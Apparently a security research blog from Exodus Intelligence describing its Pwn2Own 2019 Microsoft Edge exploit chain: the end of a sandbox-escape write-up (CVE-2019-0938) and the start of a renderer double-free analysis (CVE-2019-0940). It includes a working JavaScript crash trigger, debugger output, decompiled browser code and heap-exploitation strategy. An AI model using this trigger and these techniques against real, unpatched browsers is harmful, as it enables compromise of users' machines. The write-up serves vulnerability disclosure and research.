Next follows the call to EdgeContent!DownloadStateProgress::LCIESendToDownloadManager(). This function packs all the relevant download data (such as the current URL, path to the cache file, the referrer, name of the file, and the mime type of the file), adds padding for the meta-data, creates the so called “message buffer” and sends it to the Manager process via a call to LCIEPostMessage(). As this message is getting posted to another process, all the data is eventually placed at the shared memory section and is available for reading and writing by both the content and Manager processes. The message buffer is eventually populated with the download file GUID.

The described operation performed by DownloadStateProgress::LCIESendToDownloadManager() is important for the exploit as it indirectly leaks the address of the message buffer and the relevant download file GUID.

The allocation address of the message buffer depends on the size of the message. There are several ranges of sizes:

  • 0x0 to 0x20 bytes: unsupported (message posting fails)
  • 0x20 to 0x1d0 bytes: first slot
  • 0x1d4 to 0xfd0 bytes: second slot
  • from 0x1fd4 bytes: last slot

If the previous message with the same size slot was freed, the new message is allocated at the same address. The specifics of the message buffer allocator allows leaking the address of the next buffer without the risk of failure. After the file download is triggered, the exploit gets the address of the message buffer. After the address of the message buffer is retrieved, it is possible to parse the message buffer and extract relevant data (such as the cache path and the file download GUID).

The last important step is to send a message which triggers the browser to run the downloaded file (the actual file operation is performed by the browser broker “browser_broker.exe”) with Medium Integrity Level. The exploit code which performs the current step is borrowed from eModel!TFlatIsoMessage<DownloadOperation>::Post():

__int64 __fastcall TFlatIsoMessage&amp;amp;lt;DownloadOperation&amp;amp;gt;::Post(
    unsigned int a1,
    unsigned int a2,
    __int64 a3,
    __int64 a4,
    __int64 a5
)
{
    unsigned int v5; // esi
    unsigned int v6; // edi
    signed int result; // ebx
    __int64 isoMessage_; // r8
    __m128i threadStateGUID; // xmm0
    unsigned int v11; // [rsp+20h] [rbp-48h]
    __int128 tmpThreadStateGUID; // [rsp+30h] [rbp-38h]
    __int64 isoMessage; // [rsp+40h] [rbp-28h]
    unsigned int msgBuffer; // [rsp+48h] [rbp-20h]

    v5 = a2;
    v6 = a1;
    result = IsoAllocMessageBuffer(a1, &amp;amp;amp;msgBuffer, 0x48u, &amp;amp;amp;isoMessage);
    if ( result &amp;amp;gt;= 0 )
    {
        isoMessage_ = isoMessage;
        *(isoMessage + 0x20) = *a5;
        *(isoMessage_ + 0x30) = *(a5 + 0x10);
        *(isoMessage_ + 0x40) = *(a5 + 0x20);
        threadStateGUID = *GlobalThreadState();
        v11 = msgBuffer;
        _mm_storeu_si128(&amp;amp;amp;tmpThreadStateGUID, threadStateGUID);
        result = IsoPostMessage(v6, v5, 0xD6Bu, 0, v11, &amp;amp;amp;tmpThreadStateGUID);
        if ( result &amp;amp;lt; 0 )
        {
            IsoFreeMessageBuffer(msgBuffer);
        }
    }
    return result;
}

Last, the exploit recovers the original site URL to avoid any potential artifacts and sends messages to remove the download notification bar.

Open problems

The only issue with the exploit is that a small popup will appear for a split second before the exploit has sent a message to click the popup button. Potentially it is possible to avoid this popup by sending a different set of messages which does not require a popup to be present.

Detection

There are no trivial methods to detect exploitation of the described vulnerability as the exploit code does not require any kind of particularly notable data and is not performing any kind of exceptional activity.

Mitigation

The exploit is developed in Javascript, but there is a possibility to develop an exploit not based on Javascript which makes it non-trivial to mitigate the issue with 100% certainty.

For exploits developed in Javascript, it is possible to mitigate this issue by disabling Javascript.

The described vulnerability was patched by Microsoft in the May updates.

Conclusion

The sandbox escape exploit part is 100% reliable and portable—thus requiring almost no effort to keep it compatible with different browser versions.

Here is the video demonstrating the full exploit-chain in action:

For demonstration purposes, the exploit payload writes a file named “w00t.txt” to the user desktop, opens this file with notepad and shows a message box with the integrity level of the “payload.exe”.

Subscribers of the Exodus 0day Feed had access to this exploit for penetration tests and implementing protections for their stakeholders.

The post Pwn2Own 2019: Microsoft Edge Sandbox Escape (CVE-2019-0938). Part 2 appeared first on Exodus Intelligence.

Pwn2Own 2019: Microsoft Edge Renderer Exploitation (CVE-2019-0940). Part 1

19 May 2019 at 16:41

By Arthur Gerkis

This year Exodus Intelligence participated in the Pwn2Own competition in Vancouver. The chosen target was the Microsoft Edge browser and a full-chain browser exploit was successfully demonstrated. The exploit consisted of two parts:

  • renderer double-free vulnerability exploit achieving arbitrary read-write
  • logical vulnerability sandbox escape exploit achieving arbitrary code execution with Medium Integrity Level

This blog post describes the exploitation of the double-free vulnerability in the renderer process of Microsoft Edge 64-bit. Part 2 will describe the sandbox escape vulnerability.

The Vulnerability

The vulnerability is located in the Canvas 2D API component which is responsible for creating canvas patterns. The crash is triggered with the following JavaScript code:

let canvas = document.createElement('canvas');
let ctx = canvas.getContext('2d');

// Allocate canvas pattern objects and populate hash table.
for (let i = 0; i &amp;amp;lt; 31; i++) {
  ctx.createPattern(canvas, 'no-repeat');
}

// Here the canvas pattern objects will be freed.
gc();

// This is causing internal OOM error.
canvas.setAttribute('height', 0x4000);
canvas.setAttribute('width', 0x4000);

// This will partially initialize canvas pattern object and trigger double-free.
try {
  ctx.createPattern(canvas, 'no-repeat');
} catch (e) {

}

If you run this test-case, you may notice that the crash does not happen always, several attempts may be required. In one of the next sections it will be explained why.

With the page heap enabled, the crash would look like this:

(470.122c): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
edgehtml!TDispResourceCache::Remove+0x60:
00007ffd`2e5cd820 834708ff        add     dword ptr [rdi+8],0FFFFFFFFh ds:00000249`2681fff8=????????
0:016&amp;amp;gt; r
rax=000002490563a4a0 rbx=0000000000000000 rcx=0000000000000000
rdx=0000000000000000 rsi=000000798c7fa710 rdi=000002492681fff0
rip=00007ffd2e5cd820 rsp=000000798c7fa680 rbp=0000000000000000
 r8=0000000000000000  r9=0000024909747758 r10=0000000000000000
r11=0000000000000025 r12=00007ffd2e999310 r13=0000024904993930
r14=0000024909747758 r15=0000000000000002
iopl=0         nv up ei pl nz na po nc
cs=0033  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010206
edgehtml!TDispResourceCache::Remove+0x60:
00007ffd`2e5cd820 834708ff        add     dword ptr [rdi+8],0FFFFFFFFh ds:00000249`2681fff8=????????
0:016&amp;amp;gt; k L7
 # Child-SP          RetAddr           Call Site
00 00000079`8c7fa680 00007ffd`2e5c546d edgehtml!TDispResourceCache&amp;amp;lt;CDispNoLock,1,0&amp;amp;gt;::Remove+0x60
01 00000079`8c7fa6b0 00007ffd`2f054ad8 edgehtml!CDXSystemShared::RemoveDisplayResourceFromCache+0x6d
02 00000079`8c7fa710 00007ffd`2f054b54 edgehtml!CCanvasPattern::~CCanvasPattern+0x34
03 00000079`8c7fa740 00007ffd`2e7ac4d9 edgehtml!CCanvasPattern::`vector deleting destructor'+0x14
04 00000079`8c7fa770 00007ffd`2eb2703c edgehtml!CBase::PrivateRelease+0x159
05 00000079`8c7fa7b0 00007ffd`2f053584 edgehtml!TSmartPointer&amp;amp;lt;CCanvasPattern,CStrongReferenceTraits,CCanvasPattern * __ptr64&amp;amp;gt;::~TSmartPointer&amp;amp;lt;CCanvasPattern,CStrongReferenceTraits,CCanvasPattern * __ptr64&amp;amp;gt;+0x18
06 00000079`8c7fa7e0 00007ffd`2f050755 edgehtml!CCanvasRenderingProcessor2D::CreatePatternInternal+0xd8
0:016&amp;amp;gt; ub @rip;u @rip
edgehtml!TDispResourceCache::Remove+0x46:
00007ffd`2e5cd806 488b742440      mov     rsi,qword ptr [rsp+40h]
00007ffd`2e5cd80b 488b7c2448      mov     rdi,qword ptr [rsp+48h]
00007ffd`2e5cd810 4883c420        add     rsp,20h
00007ffd`2e5cd814 415e            pop     r14
00007ffd`2e5cd816 c3              ret
00007ffd`2e5cd817 488b7808        mov     rdi,qword ptr [rax+8]
00007ffd`2e5cd81b 4885ff          test    rdi,rdi
00007ffd`2e5cd81e 74d5            je      edgehtml!TDispResourceCache&amp;amp;lt;CDispNoLock,1,0&amp;amp;gt;::Remove+0x35 (00007ffd`2e5cd7f5)
edgehtml!TDispResourceCache::Remove+0x60:
00007ffd`2e5cd820 834708ff        add     dword ptr [rdi+8],0FFFFFFFFh
00007ffd`2e5cd824 488b0f          mov     rcx,qword ptr [rdi]
00007ffd`2e5cd827 0f85dbe04e00    jne     edgehtml!TDispResourceCache&amp;amp;lt;CDispNoLock,1,0&amp;amp;gt;::Remove+0x4ee148 (00007ffd`2eabb908)
00007ffd`2e5cd82d 48891f          mov     qword ptr [rdi],rbx
00007ffd`2e5cd830 488bd5          mov     rdx,rbp
00007ffd`2e5cd833 48890e          mov     qword ptr [rsi],rcx
00007ffd`2e5cd836 498bce          mov     rcx,r14
00007ffd`2e5cd839 e8b2f31500      call    edgehtml!CHtPvPvBaseT&amp;amp;lt;&amp;amp;amp;nullCompare,HashTableEntry&amp;amp;gt;::Remove (00007ffd`2e72cbf0)
0:016&amp;amp;gt; !heap -p -a @rdi
    address 000002492681fff0 found in
    _DPH_HEAP_ROOT @ 2497e601000
    in free-ed allocation (  DPH_HEAP_BLOCK:         VirtAddr         VirtSize)
                                249259795b0:      2492681f000             2000
    00007ffd51857608 ntdll!RtlDebugFreeHeap+0x000000000000003c
    00007ffd517fdd5e ntdll!RtlpFreeHeap+0x000000000009975e
    00007ffd5176286e ntdll!RtlFreeHeap+0x00000000000003ee
    00007ffd2e5cd871 edgehtml!TDispResourceCache&amp;amp;lt;CDispNoLock,1,0&amp;amp;gt;::CacheEntry::`scalar deleting destructor'+0x0000000000000021
    00007ffd2e5cd846 edgehtml!TDispResourceCache&amp;amp;lt;CDispNoLock,1,0&amp;amp;gt;::Remove+0x0000000000000086
    00007ffd2e5c546d edgehtml!CDXSystemShared::RemoveDisplayResourceFromCache+0x000000000000006d
    00007ffd2f054ad8 edgehtml!CCanvasPattern::~CCanvasPattern+0x0000000000000034
    00007ffd2f054b54 edgehtml!CCanvasPattern::`vector deleting destructor'+0x0000000000000014
    00007ffd2e7ac4d9 edgehtml!CBase::PrivateRelease+0x0000000000000159
    00007ffd2e89f579 edgehtml!CJScript9Holder::CBaseFinalizer+0x00000000000000a9
    00007ffd2de66f5d chakra!Js::CustomExternalObject::Dispose+0x000000000000002d
    00007ffd2de3c012 chakra!Memory::SmallFinalizableHeapBlockT&amp;amp;lt;SmallAllocationBlockAttributes&amp;amp;gt;::ForEachPendingDisposeObject&amp;amp;lt;&amp;amp;lt;lambda_37407f4cdaf1d704a79fcdd974872764&amp;amp;gt; &amp;amp;gt;+0x0000000000000092
    00007ffd2de3bf0b chakra!Memory::HeapInfo::DisposeObjects+0x000000000000013b
    00007ffd2de81faa chakra!Memory::Recycler::DisposeObjects+0x0000000000000096
    00007ffd2de81e9a chakra!ThreadContext::DisposeObjects+0x000000000000004a
    00007ffd2dd5ac35 chakra!Js::JavascriptExternalFunction::ExternalFunctionThunk+0x00000000000003a5
    00007ffd2dea7956 chakra!amd64_CallFunction+0x0000000000000086
    00007ffd2dd5f9d0 chakra!Js::InterpreterStackFrame::OP_CallCommon&amp;amp;lt;Js::OpLayoutDynamicProfile&amp;amp;lt;Js::OpLayoutT_CallIWithICIndex&amp;amp;lt;Js::LayoutSizePolicy&amp;amp;lt;0&amp;amp;gt; &amp;amp;gt; &amp;amp;gt; &amp;amp;gt;+0x00000000000002f0
    00007ffd2dd5fac8 chakra!Js::InterpreterStackFrame::OP_ProfiledCallIWithICIndex&amp;amp;lt;Js::OpLayoutT_CallIWithICIndex&amp;amp;lt;Js::LayoutSizePolicy&amp;amp;lt;0&amp;amp;gt; &amp;amp;gt; &amp;amp;gt;+0x00000000000000b8
    00007ffd2dd5fd41 chakra!Js::InterpreterStackFrame::ProcessProfiled+0x0000000000000161
    00007ffd2dd48a21 chakra!Js::InterpreterStackFrame::Process+0x00000000000000e1
    00007ffd2dd486ff chakra!Js::InterpreterStackFrame::InterpreterHelper+0x000000000000088f
    00007ffd2dd4775e chakra!Js::InterpreterStackFrame::InterpreterThunk+0x000000000000004e
    00000249226f1fb2 +0x00000249226f1fb2

Vulnerability Analysis

Javascript createPattern() triggers the native CCanvasRenderingProcessor2D::CreatePatternInternal() call:

__int64 __fastcall CCanvasRenderingProcessor2D::CreatePatternInternal(
	CCanvasRenderingProcessor2D *this,
	struct CBase *a2,
	const unsigned __int16 *a3,
	struct CCanvasPattern **a4)
{
    CCanvasRenderingProcessor2D *this_; // rsi
    struct CCanvasPattern **v5; // r14
    const unsigned __int16 *v6; // rbp
    struct CBase *v7; // r15
    void *ptr; // rax
    CBaseScriptable *canvasPattern; // rbx
    struct CSecurityContext *v10; // rax
    signed int hr; // edi
    CBaseScriptable *canvasPattern_; // [rsp+30h] [rbp-28h]

    this_ = this;
    v5 = a4;
    v6 = a3;
    v7 = a2;
    ptr = MemoryProtection::HeapAllocClear&amp;amp;lt;1&amp;amp;gt;(0x50ui64);
    canvasPattern = Abandonment::CheckAllocationUntyped(ptr, 0x50ui64);
    if ( canvasPattern )
    {
        v10 = Tree::ANode::SecurityContext(*(*(this_ + 1) + 0x30i64));
        CBaseScriptable::CBaseScriptable(canvasPattern, v10);
        *canvasPattern = &amp;amp;amp;CCanvasPattern::`vftable`;
        *(canvasPattern + 7) = 0i64; // `CCanvasPattern::Data`
        *(canvasPattern + 8) = 0i64;
        *(canvasPattern + 0x12) = 0;
    }
    else
    {
        canvasPattern = 0i64;
    }
    canvasPattern_ = canvasPattern;
    hr = CCanvasRenderingProcessor2D::EnsureBitmapRenderTarget(this_, 0); // this may fail
    if ( hr &amp;amp;gt;= 0 )
    {
        CCanvasRenderingProcessor2D::ResetSurfaceWithLayoutScaling(this_);
        hr = CCanvasPattern::Initialize(canvasPattern, v7, v6, *(*(this_ + 1) + 0x30i64), *(this_ + 0x20));
        if ( hr &amp;amp;gt;= 0 )
        {
            if ( *(canvasPattern + 0x4C) )
            {
                canvasPattern = 0i64;
            }
            else
            {
                canvasPattern_ = 0i64;
            }
            *v5 = canvasPattern;
        }
    }
    TSmartPointer&amp;amp;lt;CMediaStreamError,CStrongReferenceTraits,CMediaStreamError *&amp;amp;gt;::~TSmartPointer&amp;amp;lt;CMediaStreamError,CStrongReferenceTraits,CMediaStreamError *&amp;amp;gt;(&amp;amp;amp;canvasPattern_);
    return hr;
}

On line 21 the heap manager allocates space for the canvas pattern object and on the following lines certain members are set to 0. It is important to note the CCanvasPattern::Data member is populated on line 28.

Next follows a call to the CCanvasRenderingProcessor2D::EnsureBitmapRenderTarget() method which is responsible for video memory allocation for the canvas pattern object on a target device. In certain cases this method returns an error. For the given vulnerability the bug is triggered when Windows GDI D3DKMTCreateAllocation() returns the error STATUS_GRAPHICS_NO_VIDEO_MEMORY (error code 0xc01e0100). Setting width and height of the canvas object to huge values can cause the video device to return an out-of-memory error. The following call stack shows the path which is taken after the width and height of the canvas object have been set to the large values and after consecutive calls to createPattern():

Breakpoint 1 hit
GDI32!D3DKMTCreateAllocation:
00007ffe`67a72940 48895c2420      mov     qword ptr [rsp+20h],rbx ss:000000b3`f59f82b8=000000000000b670
0:015&amp;amp;gt; k
 # Child-SP          RetAddr           Call Site
00 000000b3`f59f8298 00007ffe`61fd598e GDI32!D3DKMTCreateAllocation
01 000000b3`f59f82a0 00007ffe`61fd39b5 d3d11!CallAndLogImpl&amp;amp;lt;long (__cdecl*)(_D3DKMT_CREATEALLOCATION * __ptr64),_D3DKMT_CREATEALLOCATION * __ptr64&amp;amp;gt;+0x1e
02 000000b3`f59f8300 00007ffe`605a1b4f d3d11!NDXGI::CDevice::AllocateCB+0x105
03 000000b3`f59f84c0 00007ffe`605a24dc vm3dum64_10+0x1b4f
04 000000b3`f59f8540 00007ffe`605ab258 vm3dum64_10+0x24dc
05 000000b3`f59f86a0 00007ffe`605ac163 vm3dum64_10!OpenAdapterWrapper+0x1b8c
06 000000b3`f59f8750 00007ffe`61fc3ce2 vm3dum64_10!OpenAdapterWrapper+0x2a97
07 000000b3`f59f87d0 00007ffe`61fc3a13 d3d11!CResource&amp;amp;lt;ID3D11Texture2D1&amp;amp;gt;::CLS::FinalConstruct+0x2b2
08 000000b3`f59f8b70 00007ffe`61fb98ba d3d11!TCLSWrappers&amp;amp;lt;CTexture2D&amp;amp;gt;::CLSFinalConstructFn+0x43
09 000000b3`f59f8bb0 00007ffe`61fbd107 d3d11!CDevice::CreateLayeredChild+0x2bca
0a 000000b3`f59fa410 00007ffe`61fbcf73 d3d11!NDXGI::CDeviceChild&amp;amp;lt;IDXGIResource1,IDXGISwapChainInternal&amp;amp;gt;::FinalConstruct+0x43
0b 000000b3`f59fa480 00007ffe`61fbca1c d3d11!NDXGI::CResource::FinalConstruct+0x3b
0c 000000b3`f59fa4d0 00007ffe`61fbd3c0 d3d11!NDXGI::CDevice::CreateLayeredChild+0x1bc
0d 000000b3`f59fa640 00007ffe`61fb43bb d3d11!NOutermost::CDevice::CreateLayeredChild+0x1b0
0e 000000b3`f59fa820 00007ffe`61fb297c d3d11!CDevice::CreateTexture2D_Worker+0x4cb
0f 000000b3`f59fade0 00007ffe`46cd68db d3d11!CDevice::CreateTexture2D+0xac
10 000000b3`f59fae70 00007ffe`46cd3dcd edgehtml!CDXResourceDomain::CreateTexture+0xfb
11 000000b3`f59faf20 00007ffe`46cd3d5e edgehtml!CDXSystem::CreateTexture+0x59
12 000000b3`f59faf70 00007ffe`46ed2dda edgehtml!CDXTextureTargetSurface::OnEnsureResources+0x15e
13 000000b3`f59fb010 00007ffe`46ed2e78 edgehtml!CDXTargetSurface::EnsureResources+0x32
14 000000b3`f59fb050 00007ffe`46ed2c71 edgehtml!CDXRenderTarget::EnsureResources+0x68
15 000000b3`f59fb0a0 00007ffe`46da4ba4 edgehtml!CDXRenderTarget::BeginDraw+0x81
16 000000b3`f59fb100 00007ffe`470180b5 edgehtml!CDXTextureRenderTarget::BeginDraw+0x34
17 000000b3`f59fb170 00007ffe`46cd8033 edgehtml!CDispSurface::BeginDraw+0xf5
18 000000b3`f59fb1d0 00007ffe`46cd7fa6 edgehtml!CCanvasRenderingProcessor2D::OpenBitmapRenderTarget+0x6b
19 000000b3`f59fb230 00007ffe`47831881 edgehtml!CCanvasRenderingProcessor2D::EnsureBitmapRenderTarget+0x52
1a 000000b3`f59fb260 00007ffe`4782eaa5 edgehtml!CCanvasRenderingProcessor2D::CreatePatternInternal+0x85
1b 000000b3`f59fb2c0 00007ffe`47539d46 edgehtml!CCanvasRenderingContext2D::Var_createPattern+0xc5
1c 000000b3`f59fb330 00007ffe`47174135 edgehtml!CFastDOM::CCanvasRenderingContext2D::Trampoline_createPattern+0x52
1d 000000b3`f59fb380 00007ffe`464dc47e edgehtml!CFastDOM::CCanvasRenderingContext2D::Profiler_createPattern+0x25
0:015&amp;amp;gt; pt
GDI32!D3DKMTCreateAllocation+0x18e:
00007ffe`67a72ace c3              ret
0:015&amp;amp;gt; r
rax=00000000c01e0100 rbx=000000b3f59f8508 rcx=1756445c6ae30000
rdx=0000000000000000 rsi=0000000000000000 rdi=00007ffe62186ae0
rip=00007ffe67a72ace rsp=000000b3f59f8298 rbp=000000b3f59f8530
 r8=000000b3f59f81c8  r9=000000b3f59f84e0 r10=0000000000000000
r11=0000000000000246 r12=0000000000000000 r13=0000000000000000
r14=000002ae9f3326c8 r15=0000000000000000
iopl=0         nv up ei pl nz na pe nc
cs=0033  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000202
GDI32!D3DKMTCreateAllocation+0x18e:
00007ffe`67a72ace c3              ret

A requirement to trigger the error is that the target hardware has an integrated video card or a video card with low memory. Such conditions are met on the VMWare graphics pseudo-hardware or on some budget devices. It is potentially possible to trigger other errors which do not depend on the target hardware resources as well.

Under normal conditions (i.e. the call to CCanvasRenderingProcessor2D::EnsureBitmapRenderTarget() method does not return any error) the CCanvasPattern::Initialize() method is called:

__int64 __fastcall CCanvasPattern::Initialize(
	CCanvasPattern *this,
	struct CBase *a2,
	const unsigned __int16 *a3,
	struct CHTMLCanvasElement *a4,
	struct CDispSurface *dispSurface
)
{
    struct CHTMLCanvasElement *canvasElement; // rbp
    const unsigned __int16 *v6; // rsi
    struct CBase *base; // rdi
    CCanvasPattern *this_; // rbx
    void *ptr; // rax
    char *canvasPatternData; // rax
    __int64 v11; // rdx
    __int64 v12; // r8
    __int64 v13; // rcx
    int initKind; // eax

    canvasElement = a4;
    v6 = a3;
    base = a2;
    this_ = this;

    // code omitted for brevity

    ptr = MemoryProtection::HeapAlloc&amp;amp;lt;0&amp;amp;gt;(0x20ui64);
    canvasPatternData = Abandonment::CheckAllocationUntyped(ptr, 0x20ui64);
    if ( canvasPatternData )
    {
        *(canvasPatternData + 0xC) = 0i64;
        *canvasPatternData = &amp;amp;amp;RefCounted&amp;amp;lt;CCanvasPattern::Data,MultiThreadedRefCount&amp;amp;gt;::`vftable`;
        *(canvasPatternData + 6) = 1;
    }
    else
    {
        canvasPatternData = 0i64;
    }

    *(this_ + 7) = canvasPatternData; // member initialized
    // code omitted for brevity

    if ( v6 &amp;amp;amp;&amp;amp;amp; *v6 )
    {
        if ( !MapCanvasStringToEnum&amp;amp;lt;enum  CCanvasPattern::Repetition&amp;amp;gt;(v6, v11, v12, (*(this_ + 7) + 8i64)) )
        {
            return 0x8070000Ci64;
        }
    }
    else
    {
        *(*(this_ + 7) + 8i64) = 0;
    }

    // code omitted for brevity

    initKind = (*(*base + 0x2A8i64))(base);
    switch ( initKind )
    {
        case 0x10C7:
            return CCanvasPattern::InitializeFromImage(this_, base, canvasElement, dispSurface);
        case 0x10B4:
            return CCanvasPattern::InitializeFromCanvas(this_, base); // is called
        case 0x10F1:
            return CCanvasPattern::InitializeFromVideo(this_, base);
    }
    return 0x80700011i64;
}

On line 40 one of the canvas pattern object members is set to point to the CCanvasPattern::Data object.

During the call to the CCanvasPattern::InitializeFromCanvas() method, a chain of calls follows. This eventually leads to a call of the following method:

__int64 __fastcall CDXSystemShared::AddDisplayResourceToCache(
	__int64 a1,
	__int64 a2,
	__int64 a3,
	_BYTE *a4,
	unsigned int a5
)
{
    __int64 v5; // rsi
    __int64 v6; // rbp
    _BYTE *v7; // rdi
    __int64 v8; // r14
    unsigned int v9; // ebx
    void (__fastcall ***v11)(_QWORD, __int64, _BYTE *); // [rsp+20h] [rbp-28h]
    void **v12; // [rsp+28h] [rbp-20h]
    __int64 v13; // [rsp+30h] [rbp-18h]
    char v14; // [rsp+38h] [rbp-10h]

    v5 = a2;
    v13 = 0i64;
    v6 = a1;
    v12 = &amp;amp;amp;CDXRenderLock::`vftable`;
    v14 = 1;
    v7 = a4;
    v8 = a3;
    CDXRenderLockBase::Acquire(&amp;amp;amp;v12, 2);
    if ( a5 != 2 || (*(*v7 + 0x18i64))(v7) == 0x8210 || (*(*v7 + 0x18i64))(v7) == 0x16 &amp;amp;amp;&amp;amp;amp; v7[0x144] &amp;amp;amp; 4 )
    {
        v9 = CDXSystemShared::GetResourceCache(v6, v5, a5, &amp;amp;amp;v11);
        if ( (v9 &amp;amp;amp; 0x80000000) == 0 )
        {
            (**v11)(v11, v8, v7); // TDispResourceCache&amp;amp;lt;CDispNoLock,1,0&amp;amp;gt;::Add
        }
    }
    else
    {
        v9 = 0x8000FFFF;
    }
    TSmartResource&amp;amp;lt;CDXRenderLock&amp;amp;gt;::~TSmartResource&amp;amp;lt;CDXRenderLock&amp;amp;gt;(&amp;amp;amp;v12);
    return v9;
}

The above method adds a display resource to the cache. In the current case, the display resource is the DXImageRenderTarget object and the cache is a hash table which is implemented in the TDispResourceCache class.

On line 32 the call to the TDispResourceCache<CDispNoLock,1,0>::Add() method happens:

HashTableEntry *__fastcall TDispResourceCache&amp;amp;lt;CDispNoLock,1,0&amp;amp;gt;::Add(
	__int64 resourceCache,
	unsigned __int64 key,
	__int64 arg_DXImageRenderTarget
)
{
    __int64 entries; // rbp
    __int64 DXImageRenderTarget; // rdi
    unsigned __int64 entryKey; // rsi
    HashTableEntry *result; // rax
    VulnObject *hashTableEntryValue; // rbx
    void *ptr; // rax
    VulnObject *newHashTableEntryValue; // rax
    char v10; // [rsp+30h] [rbp+8h]

    entries = resourceCache + 0x10;
    DXImageRenderTarget = arg_DXImageRenderTarget;
    entryKey = key;
    result = CHtPvPvBaseT&amp;amp;lt;&amp;amp;amp;int nullCompare(void const *,void const *,void const *,bool),HashTableEntry&amp;amp;gt;::FindEntry((resourceCache + 0x10), key);
    hashTableEntryValue = 0i64;
    if ( result )
    {
        hashTableEntryValue = result-&amp;amp;gt;value;
    }
    if ( !hashTableEntryValue )
    {
        ptr = MemoryProtection::HeapAlloc&amp;amp;lt;0&amp;amp;gt;(0x10ui64);
        newHashTableEntryValue = Abandonment::CheckAllocationUntyped(ptr, 0x10ui64);
        hashTableEntryValue = newHashTableEntryValue;
        if ( newHashTableEntryValue )
        {
            newHashTableEntryValue-&amp;amp;gt;ptrToDXImageRenderTarget = DXImageRenderTarget;
            if ( DXImageRenderTarget )
            {
                (*(*DXImageRenderTarget + 8i64))(DXImageRenderTarget);
            }
            LODWORD(hashTableEntryValue-&amp;amp;gt;refCounter) = 0;
        }
        else
        {
            hashTableEntryValue = 0i64;
        }
        result = CHtPvPvBaseT&amp;amp;lt;&amp;amp;amp;int nullCompare(void const *,void const *,void const *,bool),HashTableEntry&amp;amp;gt;::Insert(entries, &amp;amp;amp;v10, entryKey, hashTableEntryValue);
    }
    ++LODWORD(hashTableEntryValue-&amp;amp;gt;refCounter);
    return result;
}

On line 27 the vulnerable object is getting allocated. Important to note that the object is not allocated through the MemGC mechanism.

The hash table entries consist of a key-value pair. The key is a CCanvasPattern::Data object and the value is a DXImageRenderTarget. The initial size of the hash table allows it to hold up to 29 entries, however there is space for 37 entries. Extra entries are required to reduce the amount of possible hash collisions. A hash function is applied to each key to deduce position in the hash table. When the hash table is full, CHtPvPvBaseT<&int nullCompare(…),HashTableEntry>::Grow() method is called to increase the capacity of the hash table. During this call, key-value pairs are moved to the new indexes, keys are removed from the previous position, but values remain. If, after the growth, the key-value pair has to be removed (e.g.canvas pattern objects is freed), the value is freed and the key-value pair is removed only from the new position.

When the amount of entries is below a certain value, CHtPvPvBaseT<&int nullCompare(…),HashTableEntry>::Shrink() method is called to reduce the capacity of the hash table. When the CHtPvPvBaseT<&int nullCompare(…),HashTableEntry>::Shrink() method is called, key-value pairs are moved to the previous positions.

When the canvas pattern object is freed, the hash table entry which holds the appropriate CCanvasPattern::Data object is removed via the following method call:

__int64 __fastcall TDispResourceCache&amp;amp;lt;CDispNoLock,1,0&amp;amp;gt;::Remove(
	__int64 resourceCache,
	__int64 a2,
	_QWORD *a3
)
{
    __int64 entries; // r14
    unsigned int hr; // ebx
    _QWORD *savedPtr_out; // rsi
    __int64 entryKey; // rbp
    HashTableEntry *hashTableEntry; // rax
    VulnObject *freedObject; // rdi
    bool doFreeObject; // zf
    __int64 savedPtr; // rcx
    void *v12; // rdx

    entries = resourceCache + 0x10;
    hr = 0;
    *a3 = 0i64;
    savedPtr_out = a3;
    entryKey = a2;
    hashTableEntry = CHtPvPvBaseT&amp;amp;lt;&amp;amp;amp;int nullCompare(void const *,void const *,void const *,bool),HashTableEntry&amp;amp;gt;::FindEntry((resourceCache + 0x10), a2);
    if ( hashTableEntry &amp;amp;amp;&amp;amp;amp; (freedObject = hashTableEntry-&amp;amp;gt;value) != 0i64 )
    {
        doFreeObject = LODWORD(freedObject-&amp;amp;gt;refCounter)-- == 0;
        savedPtr = freedObject-&amp;amp;gt;ptrToDXImageRenderTarget;
        if ( doFreeObject )
        {
            freedObject-&amp;amp;gt;ptrToDXImageRenderTarget = 0i64;
            *savedPtr_out = savedPtr;
            CHtPvPvBaseT&amp;amp;lt;&amp;amp;amp;int nullCompare(void const *,void const *,void const *,bool),HashTableEntry&amp;amp;gt;::Remove(entries, entryKey);
            TDispResourceCache&amp;amp;lt;CDispSRWLock,1,1&amp;amp;gt;::CacheEntry::`scalar deleting destructor`(freedObject, v12);
        }
        else
        {
            *savedPtr_out = savedPtr;
            (*(*savedPtr + 8i64))(savedPtr);
        }
    }
    else
    {
        hr = 0x80004005;
    }
    return hr;
}

This method retrieves the hash table entry value by calling the CHtPvPvBaseT<&int nullCompare(…),HashTableEntry>::FindEntry() method.

If the call to CCanvasRenderingProcessor2D::EnsureBitmapRenderTarget() returns an error, the canvas pattern object has an uninitialized member which is supposed to hold a pointer to the CCanvasPattern::Data object. Nevertheless, the canvas pattern object destructor calls the CHtPvPvBaseT<&int nullCompare(…),HashTableEntry>::FindEntry() method and provides a key which is a nullptr. The method returns the very first value if there is any. If the hash table was grown and then shrunk, it will store pointers to the freed DXImageRenderTarget objects. Under such conditions, the TDispResourceCache<CDispNoLock,1,0>::Remove() method will operate on the already freed object (variable freedObject).

Several attempts are required to trigger vulnerability because there will not always be an entry at the first position.

It is possible to exploit this vulnerability in one of two ways:

  1. allocate some object in place of the freed object and free it thus causing a use-after-free on an almost arbitrary object
  2. allocate some object which has a suitable layout (first quad-word must be a pointer to an object with a virtual function table) to call a virtual function and cause side-effects like corrupting some useful data

The first method was chosen for exploitation because it’s difficult to find an object which fits the requirements for the second method.

Exploit Development

The exploit turned out to be non-trivial due to the following reasons:

  • Microsoft Edge allocates objects with different sizes and types on different heaps; this reduces the amount of available objects
  • the freed object is allocated on the default Windows heap which employs LFH; this makes it impossible to create adjacent allocations and reduces the chances of successful object overwrite
  • the freed object is 0x10 bytes; objects of this size are often used for internal servicing purposes; this makes the relevant heap region busy which also reduces exploitation reliability
  • there is a limited number of LFH objects of 0x10 bytes in size that are available from Javascript and are actually useful
  • objects that are available for control from Javascript allow only limited control
  • no object used during exploitation allows direct corruption of any field in a way that can lead to useful effects (e.g. controllable write)
  • multiple small heap allocations and frees were required to gain control over objects with interesting fields.

A high-level overview of the renderer exploitation process:

  1. the heap is prepared and the objects required for exploitation are sprayed
  2. all of the 0x10-byte DXImageRenderTarget objects are freed (one of them is the object which will be freed again)
